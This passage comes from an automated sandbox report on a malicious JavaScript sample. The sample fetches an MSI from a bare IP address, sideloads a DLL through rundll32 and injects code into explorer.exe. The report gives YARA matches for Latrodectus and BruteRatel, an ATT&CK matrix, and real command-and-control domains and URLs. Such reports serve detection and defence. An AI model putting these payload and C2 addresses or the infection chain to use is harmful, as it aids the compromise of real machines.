                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FD6E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00FD6E1B
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800402A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001800402A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005C2BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_000000018005C2BC

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 82.115.223.39 8041Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 443Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 80.78.24.30 8041Jump to behavior
                  Allocates memory in foreign processes
                  Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 3050000 protect: page execute and read and writeJump to behavior
                  Contains functionality to inject threads in other processes
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_00007DF459570100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,6_3_00007DF459570100
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000273F41380 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,6_2_0000000273F41380
                  Creates a thread in another existing process (thread injection)
                  Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 3050000Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 3050000 value starts with: 4D5AJump to behavior
                  Injects code into the Windows Explorer (explorer.exe)
                  Source: C:\Windows\System32\rundll32.exeMemory written: PID: 1028 base: 3050000 value: 4DJump to behavior
                  Sets debug register (to hijack the execution of another thread)
                  Source: C:\Windows\System32\rundll32.exeThread register set: 5880 1Jump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 3050000Jump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FB52F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,GetProcessId,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,4_2_00FB52F0
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCStateJump to behavior
                  Source: explorer.exe, 00000008.00000000.2452717662.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                  Source: explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 00000008.00000000.2449712553.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 00000008.00000002.3331052313.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2446927908.0000000000EF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FD35A9 cpuid 4_2_00FD35A9
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: EnumSystemLocalesW,4_2_00FEE0C6
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: EnumSystemLocalesW,4_2_00FEE1AC
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: EnumSystemLocalesW,4_2_00FE7132
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: EnumSystemLocalesW,4_2_00FEE111
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00FEE237
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: GetLocaleInfoEx,4_2_00FD23F8
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: GetLocaleInfoW,4_2_00FEE48A
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00FEE5B3
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: GetLocaleInfoW,4_2_00FEE6B9
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: GetLocaleInfoW,4_2_00FE76AF
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00FEE788
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00FEDE24
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_0000000180053038
                  Source: C:\Windows\System32\rundll32.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,6_2_0000000180052534
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_0000000180052904
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_00000001800529D4
                  Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,6_2_0000000180048A24
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_0000000180047A78
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_0000000180047BBC
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_0000000180047C44
                  Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_0000000180052E38
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FD37D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00FD37D5
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF4D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,6_2_000001FF4CAF4D00
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FE7B1F GetTimeZoneInformation,4_2_00FE7B1F
                  Source: C:\Windows\explorer.exeCode function: 8_2_0305891C RtlGetVersion,GetVersionExW,8_2_0305891C
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Bazar Loader
                  Source: Yara matchFile source: 6.2.rundll32.exe.1ff4b020000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.rundll32.exe.1ff4b0a0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.rundll32.exe.1ff4b0a0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3332247627.000001FF4B020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Yara detected BruteRatel
                  Source: Yara matchFile source: 00000006.00000003.2444968399.000001FF4CA6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5880, type: MEMORYSTR
                  Source: Yara matchFile source: 00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Latrodectus
                  Source: Yara matchFile source: 00000008.00000002.3353267482.000000000E6CB000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Bazar Loader
                  Source: Yara matchFile source: 6.2.rundll32.exe.1ff4b020000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.rundll32.exe.1ff4b0a0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.rundll32.exe.1ff4b0a0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3332247627.000001FF4B020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Yara detected BruteRatel
                  Source: Yara matchFile source: 00000006.00000003.2444968399.000001FF4CA6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5880, type: MEMORYSTR
                  Source: Yara matchFile source: 00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Latrodectus
                  Source: Yara matchFile source: 00000008.00000002.3353267482.000000000E6CB000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information2
                  Scripting                  		1
                  Replication Through Removable Media                  		1
                  Native API                  		2
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		1
                  Disable or Modify Tools                  		21
                  Input Capture                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory11
                  Peripheral Device Discovery                  		Remote Desktop Protocol21
                  Input Capture                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)812
                  Process Injection                  		3
                  Obfuscated Files or Information                  		Security Account Manager1
                  Account Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive11
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading                  		NTDS2
                  File and Directory Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  File Deletion                  		LSA Secrets35
                  System Information Discovery                  		SSHKeylogging114
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                  Masquerading                  		Cached Domain Credentials21
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Virtualization/Sandbox Evasion                  		DCSync11
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job812
                  Process Injection                  		Proc Filesystem3
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Rundll32                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  System Network Configuration Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525184 Sample: Document-18-33-08.js Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 39 tiguanin.com 2->39 41 isomicrotich.com 2->41 43 2 other IPs or domains 2->43 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Yara detected Latrodectus 2->57 59 9 other signatures 2->59 10 msiexec.exe 14 38 2->10         started        15 wscript.exe 1 2->15         started        signatures3 process4 dnsIp5 49 188.119.112.7, 49704, 80 SERVERIUS-ASNL Russian Federation 10->49 31 C:\Windows\Installer\MSIF29D.tmp, PE32 10->31 dropped 33 C:\Users\user\AppData\...\vierm_soft_x64.dll, PE32+ 10->33 dropped 35 C:\Windows\Installer\MSIF1DF.tmp, PE32 10->35 dropped 37 3 other files (none is malicious) 10->37 dropped 69 Drops executables to the windows directory (C:\Windows) and starts them 10->69 17 MSIF29D.tmp 1 10->17         started        19 msiexec.exe 10->19         started        71 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->71 file6 signatures7 process8 process9 21 rundll32.exe 17->21         started        process10 23 rundll32.exe 8 12 21->23         started        dnsIp11 45 greshunka.com 82.115.223.39, 49708, 49875, 49938 MIDNET-ASTK-TelecomRU Russian Federation 23->45 47 bazarunet.com 80.78.24.30, 49705, 49706, 49707 CYBERDYNELR Cyprus 23->47 61 System process connects to network (likely due to code injection or exploit) 23->61 63 Contains functionality to inject threads in other processes 23->63 65 Injects code into the Windows Explorer (explorer.exe) 23->65 67 5 other signatures 23->67 27 explorer.exe 58 1 23->27 injected signatures12 process13 dnsIp14 51 isomicrotich.com 188.114.96.3, 443, 50048, 50050 CLOUDFLARENETUS European Union 27->51 73 System process connects to network (likely due to code injection or exploit) 27->73 signatures15

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Document-18-33-08.js0%ReversingLabs

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\vierm_soft_x64.dll8%ReversingLabs
                  C:\Windows\Installer\MSIF101.tmp0%ReversingLabs
                  C:\Windows\Installer\MSIF160.tmp0%ReversingLabs
                  C:\Windows\Installer\MSIF1BF.tmp0%ReversingLabs
                  C:\Windows\Installer\MSIF1DF.tmp0%ReversingLabs
                  C:\Windows\Installer\MSIF29D.tmp0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://powerpoint.office.comcember0%URL Reputationsafe
                  https://excel.office.com0%URL Reputationsafe
                  http://schemas.micro0%URL Reputationsafe
                  http://x1.c.lencr.org/00%URL Reputationsafe
                  http://x1.i.lencr.org/00%URL Reputationsafe
                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
                  https://outlook.com0%URL Reputationsafe
                  https://android.notify.windows.com/iOS0%URL Reputationsafe
                  https://api.msn.com/0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  isomicrotich.com
                  		188.114.96.3
                  		truetrue
                    		unknown
                    greshunka.com
                    		82.115.223.39
                    		truetrue
                      		unknown
                      tiguanin.com
                      		80.78.24.30
                      		truetrue
                        		unknown
                        bazarunet.com
                        		80.78.24.30
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://opewolumeras.com/test/true
                            		unknown
                            https://isomicrotich.com/test/true
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://word.office.comonexplorer.exe, 00000008.00000002.3346806877.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                		unknown
                                https://tiguanin.com:8041/Frundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://greshunka.com:8041/admin.php-7rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://tiguanin.com:8041/admin.phpMrundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://opewolumeras.com/test/Pexplorer.exe, 00000008.00000002.3350911655.000000000B7DD000.00000004.00000010.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://bazarunet.com:8041/admin.phpFrundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://powerpoint.office.comcemberexplorer.exe, 00000008.00000000.2456761349.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://isomicrotich.com/explorer.exe, 00000008.00000002.3351439546.000000000C4DC000.00000004.00000001.00020000.00000000.sdmptrue
                                            		unknown
                                            https://bazarunet.com:8041/bazar.phpirundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://greshunka.com/g;rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://tiguanin.com:8041/Qrundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://bazarunet.com:8041/net.com:8041/bazar.phprundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://bazarunet.com:8041/zar.phprundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://greshunka.com:8041/admin.phpl.muirundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://greshunka.com:8041/bazar.php3?8rundll32.exe, 00000006.00000003.2927135917.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://excel.office.comexplorer.exe, 00000008.00000000.2452717662.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://schemas.microexplorer.exe, 00000008.00000000.2452162910.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3344619758.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2451505146.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://isomicrotich.com/test/Mexplorer.exe, 00000008.00000002.3352293048.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://bazarunet.com:8041/admin.phpO#rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://tiguanin.com:8041/bazar.phprundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://bazarunet.com:8041/azar.phprundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://tiguanin.com:8041/Lrundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://tiguanin.com:8041/Nrundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://188.119.112.7/das.msiwscript.exe, 00000000.00000002.2065296412.00000196D5AD6000.00000004.00000020.00020000.00000000.sdmp, Document-18-33-08.jstrue
                                                                        		unknown
                                                                        https://bazarunet.com:8041/admin.php.rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://bazarunet.com:8041/bazar.phpll.muirundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://tiguanin.com:8041/&rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://bazarunet.com:8041/admin.php9#rundll32.exe, 00000006.00000002.3332514374.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036648885.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://tiguanin.com:8041/%rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://x1.c.lencr.org/0rundll32.exe, 00000006.00000003.3197779910.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526696898.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2727327156.000001FF4CA51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3333625550.000001FF4CF10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2927135917.000001FF4CA50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2477041735.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2536162683.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2536131672.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2444803935.000001FF4CA4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
